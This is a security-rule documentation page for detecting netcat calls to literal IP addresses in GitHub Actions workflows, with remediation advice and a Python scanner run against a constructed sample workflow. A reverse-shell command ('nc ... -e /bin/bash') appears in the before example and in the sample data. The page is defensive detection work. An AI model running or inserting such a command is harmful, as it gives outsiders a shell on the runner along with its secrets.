Suspicious use of netcat with IP address
Description
This policy flags `run:` steps in GitHub Actions workflow files that invoke netcat (`nc`, `ncat`, `netcat`) with a literal IP address. Netcat opens raw TCP or UDP connections from the command line, and with its `-e`/`--exec` option (or an equivalent pipe trick) it connects a shell on the runner to a remote host, i.e. a reverse shell. A runner that has checked out the repository typically also holds the job's `GITHUB_TOKEN` and any secrets passed to the step, so a hardcoded remote address in a workflow may indicate an attempt to hand that access, or the build's files, to an outside party. Treat any such command as suspicious until its purpose is confirmed: review who added it, what it connects to, and whether the workflow needs it at all.
Code Example
```yaml
# Before:
steps:
  - name: Execute command
    run: 'nc 192.168.1.100 8080 -e /bin/bash'

# After:
steps:
  - name: Execute command
    run: 'echo "Netcat command removed for security reasons"'
```
Remediation
Remove the netcat command from the workflow, or replace it with a step whose purpose is clear. If the workflow genuinely needs to test network reachability, do it without `-e`/`--exec`, target a host name that is documented in the repository rather than a hardcoded IP address, and make sure the step cannot be used to read secrets or spawn a shell. Any remaining use of netcat should be reviewed and approved by the repository owners before the workflow runs on protected branches.
Rule Details
| Field | Value |
|---|---|
| ID | IAC-1027 |
| Severity | HIGH |
| IaC Type | github_actions |
| Frameworks | jobs, jobs.*.steps[] |
| Checkov ID | CKV_GHA_4 |
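The following is an added example of the detection this rule describes, written for this page rather than taken from Checkov; the matching heuristic (a netcat binary name followed later in the same shell command by a dotted-quad IPv4) is an assumption and is not the regex CKV_GHA_4 itself uses. The workflow is a constructed sample written as the Python structure a YAML loader would return, so the script runs offline without PyYAML. It walks the `jobs.*.steps[]` path from the table, splits each `run:` script into individual shell commands, and reports the ones that invoke netcat against a literal address.

```python
"""Scan GitHub Actions jobs for netcat invocations that target a literal IPv4 address.

Added example for the "Suspicious use of netcat with IP address" rule; the
matching heuristic below is an assumption, not Checkov's own implementation.
"""
import re
import shlex
from typing import Any, Dict, List, Tuple

NETCAT_NAMES = {"nc", "ncat", "netcat"}
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
# Boundaries between shell commands inside one run: script: newline, ';', '&&', '||', '|'.
COMMAND_SPLIT_RE = re.compile(r"\n|;|&&|\|\||\|")

Finding = Tuple[str, int, str, str]  # (job_id, step_index, step_name, command)


def _tokens(command: str) -> List[str]:
    """Shell-style tokenisation; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(command, posix=True)
    except ValueError:
        return command.split()


def netcat_with_ip(command: str) -> bool:
    """True if a netcat binary (by basename, so /usr/bin/nc and `sudo nc` count)
    appears in the command and a literal IPv4 address follows it."""
    toks = _tokens(command)
    nc_pos = next(
        (i for i, t in enumerate(toks) if t.rsplit("/", 1)[-1] in NETCAT_NAMES), None
    )
    if nc_pos is None:
        return False
    return any(IPV4_RE.match(t) for t in toks[nc_pos + 1:])


def scan_workflow(workflow: Dict[str, Any]) -> List[Finding]:
    """Walk jobs.*.steps[].run and collect every command flagged by netcat_with_ip."""
    findings: List[Finding] = []
    for job_id, job in (workflow.get("jobs") or {}).items():
        for idx, step in enumerate(job.get("steps") or []):
            script = step.get("run")
            if not isinstance(script, str):
                continue  # `uses:` steps carry no inline shell
            for cmd in COMMAND_SPLIT_RE.split(script):
                cmd = cmd.strip()
                if cmd and netcat_with_ip(cmd):
                    findings.append((job_id, idx, step.get("name", f"step {idx}"), cmd))
    return findings


# Constructed sample workflow (not from any real repository), shaped like
# yaml.safe_load output. Steps 1 and 2 should be flagged; 3 and 4 should not.
WORKFLOW: Dict[str, Any] = {
    "name": "build",
    "on": "push",
    "jobs": {
        "build": {
            "runs-on": "ubuntu-latest",
            "steps": [
                {"uses": "actions/checkout@v4"},
                {"name": "Execute command", "run": "nc 192.168.1.100 8080 -e /bin/bash"},
                {
                    "name": "Probe",
                    "run": "curl -sf https://example.com/health\n"
                    "/usr/bin/nc -zv 10.0.0.5 443 && echo up",
                },
                {"name": "Local check", "run": "nc -z localhost 5432"},
                {"name": "Docs", "run": "echo 'nc is the netcat binary'"},
            ],
        }
    },
}


if __name__ == "__main__":
    for job_id, idx, name, cmd in scan_workflow(WORKFLOW):
        print(f"HIGH jobs.{job_id}.steps[{idx}] ({name}): {cmd}")
```

The basename check means a path-qualified or `sudo`-prefixed netcat is still caught, while a host name such as `localhost` is deliberately not flagged because the rule is specifically about literal IP addresses; a reviewer should still look at those by hand. Splitting on shell separators keeps a benign `curl` on one line from masking a netcat call on the next.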